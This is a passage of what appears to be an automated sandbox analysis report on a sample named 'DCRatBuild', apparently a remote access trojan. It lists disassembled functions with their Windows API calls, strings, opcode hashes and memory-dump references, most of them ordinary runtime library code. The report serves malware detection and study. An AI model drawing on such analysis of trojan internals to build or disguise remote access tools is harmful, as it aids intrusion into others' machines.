                                      • CloseHandle.KERNEL32(?,?,00000000,?,00F080B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0A41D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: File$Create$CloseHandleTime
                                      • String ID:
                                      • API String ID: 2287278272-0
                                      • Opcode ID: d63aeae02533788c7893e9b292bf0f1a2d336381641db6db3d44b464e1d3ace3
                                      • Instruction ID: 098dab71364dc890c262f207ff1f67dd73bc1c54d8c757ea2ced7f80e01ca341
                                      • Opcode Fuzzy Hash: d63aeae02533788c7893e9b292bf0f1a2d336381641db6db3d44b464e1d3ace3
                                      • Instruction Fuzzy Hash: 6E41ED71648384AAE731DF24CC45FEEBBE8AB85724F04091CB5D0D31D1D6A99A88FB13
                                      Function 00F2C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00F289AD,?,00000000,?,00000001,?,?,00000001,00F289AD,?), ref: 00F2C0E6
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F2C16F
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F267E2,?), ref: 00F2C181
                                      • __freea.LIBCMT ref: 00F2C18A
                                        • Part of subcall function 00F28518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2C13D,00000000,?,00F267E2,?,00000008,?,00F289AD,?,?,?), ref: 00F2854A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: 1f45d2e7e01bba06672d23f610bb59c6ccaf908a7add9af38899d8b5c2a55940
                                      • Instruction ID: d3bddd41d94c47e58c992cf9e93992b66ffdb6e2947669e9bed3fe7ba9f706fa
                                      • Opcode Fuzzy Hash: 1f45d2e7e01bba06672d23f610bb59c6ccaf908a7add9af38899d8b5c2a55940
                                      • Instruction Fuzzy Hash: 3C31A072A0012AABDB259F64EC46DAE7BA5EB44720F150229FC04D7151E739CD61EBE0
                                      Function 00F22503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00F2251A
                                        • Part of subcall function 00F22B52: ___AdjustPointer.LIBCMT ref: 00F22B9C
                                      • _UnwindNestedFrames.LIBCMT ref: 00F22531
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00F22543
                                      • CallCatchBlock.LIBVCRUNTIME ref: 00F22567
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID:
                                      • API String ID: 2633735394-0
                                      • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction ID: 8ba1e353476c74f6d3089134be5f61280ed27dc2a894813c470b25c0312a669f
                                      • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction Fuzzy Hash: F7012932400119BBCF129F55EC42EDA3BBAEF58714F058114FD1866120C37AE9A1EBA1
                                      Function 00F19DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00F19DBE
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F19DCD
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F19DDB
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00F19DE9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 3c8df9687095bf08364eabef3257d156cfd1f71c8b673997e6f31915735962c3
                                      • Instruction ID: 9d3ca9f4a7151ea1476019becf42d683f0758fed02325189b881693b505cae16
                                      • Opcode Fuzzy Hash: 3c8df9687095bf08364eabef3257d156cfd1f71c8b673997e6f31915735962c3
                                      • Instruction Fuzzy Hash: D6E08C31989A25B7C3A01BA0BC0CBCF3B14AB0A7A2F040000FA11A61A0DAB44401FB90
                                      Function 00F22016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00F22016
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00F2201B
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00F22020
                                        • Part of subcall function 00F2310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00F2311F
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00F22035
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction ID: 04992cc12e0487526c66e574098e8130ae040f0bf9472c5baeeb0988693aaead
                                      • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction Fuzzy Hash: 6EC04CA5804670F41CA1BAB13D026BD3B000E62BD4B9225C2E98017143DF0E0B2AB032
                                      Function 00F19F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F19DF1: GetDC.USER32(00000000), ref: 00F19DF5
                                        • Part of subcall function 00F19DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F19E00
                                        • Part of subcall function 00F19DF1: ReleaseDC.USER32(00000000,00000000), ref: 00F19E0B
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00F19F8D
                                        • Part of subcall function 00F1A1E5: GetDC.USER32(00000000), ref: 00F1A1EE
                                        • Part of subcall function 00F1A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00F1A21D
                                        • Part of subcall function 00F1A1E5: ReleaseDC.USER32(00000000,?), ref: 00F1A2B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID: (
                                      • API String ID: 1061551593-3887548279
                                      • Opcode ID: abfd4066a248cab151de8120a4231fbf61594bff8dfb0e9ae5138442ec48861f
                                      • Instruction ID: 95149e9685bf51f205a7548c2f3675520a943a6741742a43b3d4e841351b806b
                                      • Opcode Fuzzy Hash: abfd4066a248cab151de8120a4231fbf61594bff8dfb0e9ae5138442ec48861f
                                      • Instruction Fuzzy Hash: 52811271608218AFC614DF68CC44A6BBBEAFF88714F00491DF99AD7260CB75ED05EB52
                                      Function 00F10E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _swprintf
                                      • String ID: %ls$%s: %s
                                      • API String ID: 589789837-2259941744
                                      • Opcode ID: eb2ce240fcd28e00679552be88ec3f0b47e6d96237bfef41d5b107986766d176
                                      • Instruction ID: 5c4d75c78510f37140564bdf1d9d34c4a6651bf8ac67d4520bae1dd0a45826f9
                                      • Opcode Fuzzy Hash: eb2ce240fcd28e00679552be88ec3f0b47e6d96237bfef41d5b107986766d176
                                      • Instruction Fuzzy Hash: BD51A033A8C704FAEA211AA5DD13FF67655FB08B00F20891AF79A648E5CED255D0B713
                                      Function 00F2A918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00F2AA84
                                        • Part of subcall function 00F28849: IsProcessorFeaturePresent.KERNEL32(00000017,00F28838,00000050,00F33958,?,00F0CFE0,00000004,00F40EE8,?,?,00F28845,00000000,00000000,00000000,00000000,00000000), ref: 00F2884B
                                        • Part of subcall function 00F28849: GetCurrentProcess.KERNEL32(C0000417,00F33958,00000050,00F40EE8), ref: 00F2886D
                                        • Part of subcall function 00F28849: TerminateProcess.KERNEL32(00000000), ref: 00F28874
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: *?$.
                                      • API String ID: 2667617558-3972193922
                                      • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                                      • Instruction ID: 32df2a52c207637fb72ce0548da65cffce60b872a8b970069777a7bb1d1f0594
                                      • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                                      • Instruction Fuzzy Hash: 3E51B071E0022AEFDF14DFA8DC81AADB7B5EF48310F258169E854E7300E6399E41DB51
                                      Function 00F0772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F07730
                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F078CC
                                        • Part of subcall function 00F0A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F0A27A,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A458
                                        • Part of subcall function 00F0A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F0A27A,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A489
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: File$Attributes$H_prologTime
                                      • String ID: :
                                      • API String ID: 1861295151-336475711
                                      • Opcode ID: 7fa0db764e376c42ad6957ef4ab1a71561a674cbe521323045e630e8034d37a5
                                      • Instruction ID: ae8b9d1e130a216ae835ff5da2ff95817da6c87656ef4d3bd2a83c87a8bfccd2
                                      • Opcode Fuzzy Hash: 7fa0db764e376c42ad6957ef4ab1a71561a674cbe521323045e630e8034d37a5
                                      • Instruction Fuzzy Hash: 56416771D04258AADB24EB50DD55EEEB37CAF45340F0080D9B605A20D2EB786F88FF61
                                      Function 00F0B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UNC$\\?\
                                      • API String ID: 0-253988292
                                      • Opcode ID: 544700b581ceea7b850a540ad2dab9702230ea5fefc80fe2ee24855e466e97ac
                                      • Instruction ID: 60c960621f94efd1ebb5444f404bcba273d7418e49eb2cd4e1cb65d9c1970dd7
                                      • Opcode Fuzzy Hash: 544700b581ceea7b850a540ad2dab9702230ea5fefc80fe2ee24855e466e97ac
                                      • Instruction Fuzzy Hash: D241C33694021ABACF20AF21DC41EEF77ADAF44760F104465F814A31D2E778DA54FA64
                                      Function 00F18FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Shell.Explorer$about:blank
                                      • API String ID: 0-874089819
                                      • Opcode ID: 84889088efb820aaf81fefa771b30e1023dd18f8a724952c70d2bb11456bb98e
                                      • Instruction ID: caf860b8061a1eb1fa72cc50bc50204eadc13cfd2f6c1caa1cb2f1ec6046752b
                                      • Opcode Fuzzy Hash: 84889088efb820aaf81fefa771b30e1023dd18f8a724952c70d2bb11456bb98e
                                      • Instruction Fuzzy Hash: 482187716083149FDB04DF74CC65A667799FF48721B14855DF8098B281DBB5EC41EBA0
                                      Function 00F0EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F0EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F0EB92
                                        • Part of subcall function 00F0EB73: GetProcAddress.KERNEL32(00F481C0,CryptUnprotectMemory), ref: 00F0EBA2
                                      • GetCurrentProcessId.KERNEL32(?,?,?,00F0EBEC), ref: 00F0EC84
                                      Strings
                                      • CryptUnprotectMemory failed, xrefs: 00F0EC7C
                                      • CryptProtectMemory failed, xrefs: 00F0EC3B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentProcess
                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                      • API String ID: 2190909847-396321323
                                      • Opcode ID: 0c1f0902961d6a887b917cecb627080d4e60a6dd5110865bf309db40364f4448
                                      • Instruction ID: 1b54abe15acd670e805b5ebdfeae556b91c262d9251fa0310ac2142d4f337453
                                      • Opcode Fuzzy Hash: 0c1f0902961d6a887b917cecb627080d4e60a6dd5110865bf309db40364f4448
                                      • Instruction Fuzzy Hash: C8113632E00228ABFB149B24DD06A6E3B14AF41774B04841AFC05AB2D1CB7A9E41F7D4
                                      Function 00F10889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00010000,00F109D0,?,00000000,00000000), ref: 00F108AD
                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00F108F4
                                        • Part of subcall function 00F06E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F06EAF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                      • String ID: CreateThread failed
                                      • API String ID: 2655393344-3849766595
                                      • Opcode ID: 02af64642aec4f2832e07e8bd034165961413dcab53e13caa4832759d1c63a7c
                                      • Instruction ID: 55ce6381ca1e56f76306f91c78ec7d8c28a09ec38bd72fd24b2b74d41768f46c
                                      • Opcode Fuzzy Hash: 02af64642aec4f2832e07e8bd034165961413dcab53e13caa4832759d1c63a7c
                                      • Instruction Fuzzy Hash: 1201D6B52443066FE624AF54EC81BA67798EB40735F20003DFE86A6181CEF1B8C5B664
                                      Function 00F0130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F0DA98: _swprintf.LIBCMT ref: 00F0DABE
                                        • Part of subcall function 00F0DA98: _strlen.LIBCMT ref: 00F0DADF
                                        • Part of subcall function 00F0DA98: SetDlgItemTextW.USER32(?,00F3E154,?), ref: 00F0DB3F
                                        • Part of subcall function 00F0DA98: GetWindowRect.USER32(?,?), ref: 00F0DB79
                                        • Part of subcall function 00F0DA98: GetClientRect.USER32(?,?), ref: 00F0DB85
                                      • GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                      • SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                      • String ID: 0
                                      • API String ID: 2622349952-4108050209
                                      • Opcode ID: b152446f1018310a5d8aa6aeba5325cf9e9255863e4886eca205286f224bc9b6
                                      • Instruction ID: 96714ffa83eb357bc4e6df8d1bfedb9b3614b5be15ea4781073b0879b0f79b41
                                      • Opcode Fuzzy Hash: b152446f1018310a5d8aa6aeba5325cf9e9255863e4886eca205286f224bc9b6
                                      • Instruction Fuzzy Hash: 7DF03C7050424CA6DF755F608C09BAD3B98BB15355F088414FD49565E2CBB8C999FA50
                                      Function 00F1084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00F10A78,?), ref: 00F10854
                                      • GetLastError.KERNEL32(?), ref: 00F10860
                                        • Part of subcall function 00F06E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F06EAF
                                      Strings
                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00F10869
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1091760877-2248577382
